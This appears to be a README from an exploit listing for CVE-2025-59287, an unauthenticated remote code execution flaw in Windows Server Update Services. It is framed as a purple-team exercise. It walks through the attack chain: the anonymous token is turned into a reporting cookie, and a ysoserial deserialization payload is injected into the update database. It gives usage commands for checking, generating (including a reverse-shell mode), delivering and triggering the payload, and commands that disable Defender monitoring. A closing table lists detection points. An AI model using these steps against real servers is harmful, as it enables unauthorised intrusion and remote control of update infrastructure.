Share
## https://sploitus.com/exploit?id=05B7964F-3C78-5795-8760-590DC9F72583
# CVE-2025-59287 โ€” WSUS Unauthenticated RCE

Purple team exercise scripts for CVE-2025-59287, an unauthenticated remote code execution vulnerability in Windows Server Update Services (WSUS).

**Authorized use only.** For use in controlled exercise environments against systems you own or have explicit written permission to test.

## How It Works

The vulnerability abuses anonymously accessible WSUS SOAP endpoints to inject a malicious deserialization payload into the WSUS database. The payload executes when the WSUS administrative console is opened or a sync is triggered.

1. WSUS auth service issues a valid token to any anonymous client
2. Token is exchanged for a reporting session cookie via the client web service
3. Malicious serialized object is injected into the WSUS database via the reporting service
4. Payload executes when the WSUS console loads or a sync event fires

## Requirements

- Windows attack box with PowerShell 5.1+
- Network access to WSUS on port `8530`
- ysoserial.net placed in the `ysoserial/` folder (see Setup)
- Windows Defender exclusion on attack box

## Repository Structure

```
wsus-cve-2025-59287/
โ”œโ”€โ”€ scripts/
โ”‚   โ”œโ”€โ”€ 1-check.ps1       # Verify target is vulnerable
โ”‚   โ”œโ”€โ”€ 2-generate.ps1    # Generate serialized payload blob
โ”‚   โ”œโ”€โ”€ 3-deliver.ps1     # Deliver payload to WSUS server
โ”‚   โ””โ”€โ”€ 4-verify.ps1      # Verify execution and clean up
โ”œโ”€โ”€ ysoserial/            # Place ysoserial.net release here (not committed)
โ”‚   โ””โ”€โ”€ Release/
โ”‚       โ””โ”€โ”€ ysoserial.exe
โ””โ”€โ”€ README.md
```

## Setup

Clone the repo and add ysoserial.net so the path matches `ysoserial\Release\ysoserial.exe`.

Disable Tamper Protection via the GUI first:

```
Windows Security > Virus & threat protection settings > Tamper Protection > Off
```

Then in an elevated PowerShell:

```powershell
Add-MpPreference -ExclusionPath "C:\path\to\repo"
Set-MpPreference -DisableRealtimeMonitoring $true
```

## Usage

### 1 โ€” Check

```powershell
.\scripts\1-check.ps1 -TargetURL "http://:8530"
```

### 2 โ€” Generate

File drop (no listener needed, recommended first):

```powershell
.\scripts\2-generate.ps1 -Mode filedrop
```

Reverse shell:

```powershell
.\scripts\2-generate.ps1 -Mode shell -LHost  -LPort 4444
```

### 3 โ€” Deliver

```powershell
.\scripts\3-deliver.ps1 -TargetURL "http://:8530"
```

### 4 โ€” Trigger

On the WSUS server open the administrative console via Start > Windows Server Update Services, or trigger a sync via PowerShell:

```powershell
$wsus = [Microsoft.UpdateServices.Administration.AdminProxy]::GetUpdateServer('localhost', $false, 8530)
$wsus.GetSubscription().StartSynchronization()
```

### 5 โ€” Verify and Clean Up

Verify execution:

```powershell
.\scripts\4-verify.ps1
```

Verify and clean up all artifacts:

```powershell
.\scripts\4-verify.ps1 -Cleanup
```

From attack box via admin share:

```powershell
.\scripts\4-verify.ps1 -WsusIP  -Cleanup
```

After cleanup remove the exercise computer from the WSUS console under Computers.

## Detection Opportunities

| Detection Point | Detail |
|---|---|
| Anonymous token requests from non-domain assets | WSUS auth service contacted by unmanaged hosts |
| Abnormal reporting event volume | Spike in EventID 389 in SUSDB with no corresponding sync |
| WSUS process spawning child processes | W3WP or WSUS service spawning cmd.exe or powershell.exe |
| Unexpected outbound connections | WSUS server connecting to unknown external hosts |
| Anomalous file writes by WSUS process | Files written to system paths by the app pool identity |

## References

- CVE-2025-59287 original research: [hawktrace.com](https://hawktrace.com/blog/CVE-2025-59287-UNAUTH)
- Microsoft WSUS documentation